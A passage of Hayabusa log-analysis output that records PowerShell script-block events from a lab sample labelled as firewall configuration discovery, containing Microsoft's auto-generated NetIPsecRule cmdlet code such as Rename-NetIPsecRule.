[Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try {",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.770 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"__cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue)",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.770 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"$__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.770 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Rename-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryp",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.770 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"toSet')] 